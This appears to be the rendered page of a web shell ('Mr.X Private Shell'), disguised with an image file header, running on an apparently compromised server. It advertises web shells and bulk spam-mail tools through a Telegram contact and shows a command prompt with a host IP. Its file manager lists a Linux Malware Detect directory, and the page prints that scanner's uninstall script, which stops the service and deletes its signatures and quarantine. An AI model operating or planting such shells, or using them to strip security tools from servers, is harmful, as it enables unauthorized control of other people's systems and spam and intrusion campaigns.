����JFIF��������� Mr.X
  
  __  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

deexcl@216.73.217.71: ~ $
#!/usr/bin/env bash
export PATH=/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin:$PATH
echo "This will completely remove Linux Malware Detect from your server including all quarantine data!"
echo -n "Would you like to proceed? "
read -p "[y/n] " -n 1 Z
echo
if [ "$Z" == "y" ] || [ "$Z" == "Y" ]; then
	if [ "$OSTYPE" != "FreeBSD" ]; then
		if test `cat /proc/1/comm` = "systemd"
		then
			systemctl disable maldet.service
			systemctl stop maldet.service
			rm -f /usr/lib/systemd/system/maldet.service
			systemctl daemon-reload
		else
			maldet -k
			if [ -f /etc/redhat-release ]; then
				/sbin/chkconfig maldet off
				/sbin/chkconfig maldet --del
			elif [ -f /etc/debian_version ] || [ -f /etc/lsb-release ]; then
				update-rc.d -f maldet remove
			elif [ -f /etc/gentoo-release ]; then
				rc-update del maldet default
			elif [ -f /etc/slackware-version ]; then
				rm -f /etc/rc.d/rc3.d/S70maldet
				rm -f /etc/rc.d/rc4.d/S70maldet
				rm -f /etc/rc.d/rc5.d/S70maldet
			else
				/sbin/chkconfig maldet off
				/sbin/chkconfig maldet --del
			fi
			rm -f /etc/init.d/maldet
		fi
	fi
	rm -rf /usr/local/maldetect* /etc/cron.d/maldet_pub /etc/cron.daily/maldet /usr/local/sbin/maldet /usr/local/sbin/lmd
	clamav_paths="/usr/local/cpanel/3rdparty/share/clamav/ /var/lib/clamav/ /var/clamav/ /usr/share/clamav/ /usr/local/share/clamav"
	for cpath in $clamav_paths; do
		rm -f $cpath/rfxn.* $cpath/lmd.user.*
	done
	echo "Linux Malware Detect has been uninstalled."
else
	echo "You selected No or provided an invalid confirmation, nothing has been done!"
fi

Filemanager

Name Type Size Permission Actions
clean Folder 0755
cron Folder 0755
internals Folder 0755
logs Folder 0755
pub Folder 0755
quarantine Folder 0750
service Folder 0755
sess Folder 0750
sigs Folder 0755
sigs.old Folder 0755
tmp Folder 0755
CHANGELOG File 47.91 KB 0644
COPYING.GPL File 17.67 KB 0644
README File 23.87 KB 0644
VERSION File 6 B 0644
VERSION.hash File 64 B 0644
conf.maldet File 15.24 KB 0644
conf.maldet.cron File 155 B 0644
event_log File 3.72 KB 0644
hookscan.sh File 702 B 0755
ignore_file_ext File 0 B 0644
ignore_inotify File 220 B 0644
ignore_paths File 44 B 0644
ignore_sigs File 0 B 0644
maldet File 7.47 KB 0755
maldet.1 File 10.12 KB 0644
modsec.sh File 702 B 0755
monitor_paths File 0 B 0644
uninstall.sh File 1.54 KB 0755